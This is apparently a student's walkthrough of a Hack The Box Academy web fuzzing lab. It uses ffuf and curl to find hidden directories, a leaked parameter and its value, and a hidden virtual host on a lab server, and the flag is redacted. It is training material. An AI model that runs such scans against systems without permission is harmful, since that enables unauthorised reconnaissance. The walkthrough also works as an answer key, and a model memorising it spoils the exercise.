Platform: Hack The Box Academy Module: Web Fuzzing Difficulty: Medium Tools: ffuf, curl Wordlist: SecLists — common.txt

🗺️ Attack Path Overview

# Technique Discovery 1 Directory Fuzzing /admin 2 Extension Fuzzing /admin/panel.php 3 Parameter Discovery accessID (leaked in error) 4 Value Fuzzing accessID=getaccess 5 VHost Fuzzing hidden.fuzzing_fun.htb 6 Deep Directory Fuzzing /godeep/stoneedge/bbclone/typo3/... 7 Flag HTB{...} 🎉

🔍 Step-by-Step Walkthrough

STEP 01 — Root Directory Fuzzing

We start by fuzzing the root of the target to discover hidden directories.

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u http://154.57.164.77:30770/FUZZ \
     -mc 200,301,302

Result:

admin   [Status: 301, Size: 323]

A 301 redirect means the directory exists. Let's go deeper.

STEP 02 — Extension Fuzzing inside /admin

Accessing /admin/ returns "Access Denied" with a body size of 13 bytes. We fuzz inside it with multiple extensions and filter out the false positives using -fs 13.

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u http://154.57.164.77:30770/admin/FUZZ \
     -e .php,.html,.txt,.bak \
     -mc 200,301,302 \
     -fs 13

Result:

panel.php   [Status: 200, Size: 58]

STEP 03 — Inspect panel.php

curl http://154.57.164.77:30770/admin/panel.php

Result:

Invalid parameter, please ensure accessID is set correctly

💡 The error message leaks the parameter name: accessID — this is a classic Information Disclosure vulnerability.

STEP 04 — Fuzz the Parameter Value

Now we fuzz the value of accessID using the same wordlist, filtering the default 58-byte response.

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://154.57.164.77:30770/admin/panel.php?accessID=FUZZ" \
     -mc 200,301,302 \
     -fs 58

Result:

getaccess   [Status: 200, Size: 68]

STEP 05 — Access the Panel

curl "http://154.57.164.77:30770/admin/panel.php?accessID=getaccess"

Result:

Head on over to the fuzzing_fun.htb vhost for some more fuzzing fun!

We have a new clue — a virtual host to discover.

STEP 06 — Add VHost & Get Next Hint

echo "154.57.164.77 fuzzing_fun.htb" | sudo tee -a /etc/hosts
curl http://fuzzing_fun.htb:30770/

Result:

Welcome to fuzzing_fun.htb!
Your next starting point is in the godeep folder - but it might be on this vhost, it might not, who knows...

The hint says /godeep might be on another vhost — time for VHost fuzzing.

STEP 07 — Virtual Host Fuzzing

First, we identify the default response size for unknown vhosts:

curl -s -H "Host: test.htb" http://154.57.164.77:30770/ | wc -c
# → 273 bytes

Now fuzz for subdomains of fuzzing_fun.htb, filtering the default 273-byte response:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://154.57.164.77:30770/" \
     -H "Host: FUZZ.fuzzing_fun.htb" \
     -mc 200,301,302 \
     -fs 273

Result:

hidden   [Status: 200, Size: 45]

STEP 08 — Add Hidden VHost & Enter /godeep

echo "154.57.164.77 hidden.fuzzing_fun.htb" | sudo tee -a /etc/hosts
curl http://hidden.fuzzing_fun.htb:30770/godeep/
# → "Keep going..."

Time to fuzz deeper! We filter size 12 (the "Keep going" response):

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://hidden.fuzzing_fun.htb:30770/godeep/FUZZ" \
     -mc 200,301,302 \
     -e .php,.html,.txt \
     -fs 12

Result:

stoneedge   [Status: 301]

STEP 09 — Deep Directory Fuzzing (Keep Going!)

We keep fuzzing layer by layer, each time filtering the previous response size:

Layer 2 — /godeep/stoneedge/

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://hidden.fuzzing_fun.htb:30770/godeep/stoneedge/FUZZ" \
     -mc 200,301,302 -e .php,.html,.txt -fs 13
bbclone   [Status: 301]   # "Almost there..."

Layer 3 — /godeep/stoneedge/bbclone/

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://hidden.fuzzing_fun.htb:30770/godeep/stoneedge/bbclone/FUZZ" \
     -mc 200,301,302 -e .php,.html,.txt -fs 17
typo3   [Status: 301]   # "Just a bit more..."

Layer 4 — /godeep/stoneedge/bbclone/typo3/

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
     -u "http://hidden.fuzzing_fun.htb:30770/godeep/stoneedge/bbclone/typo3/FUZZ" \
     -mc 200,301,302 -e .php,.html,.txt -fs [response_size]

Keep fuzzing each new directory until you reach the final page with the flag!

🚩 Flag

HTB{...}

(Replace with the actual flag after completing the challenge)

💡 Key Takeaways

Technique Lesson Learned Directory Fuzzing Always fuzz with multiple extensions, not just directory names False Positives Use -fs to filter repeated response sizes Error Messages Error messages can leak sensitive info like parameter names VHost Fuzzing Change the Host header — not the URL — to discover virtual hosts Deep Enumeration Keep fuzzing every new directory you find recursively Wordlist Selection common.txt is enough for many cases — choose your wordlist wisely

🛠️ Tools & References

• ffuf — https://github.com/ffuf/ffuf
• SecLists — https://github.com/danielmiessler/SecLists
• HTB Academy Web Fuzzing Module — https://academy.hackthebox.com

Written as part of HTB Academy — Web Fuzzing module walkthrough. Happy Hacking! 🎯

Ahmed Hassan ELfekiry — CyberSecurity Researcher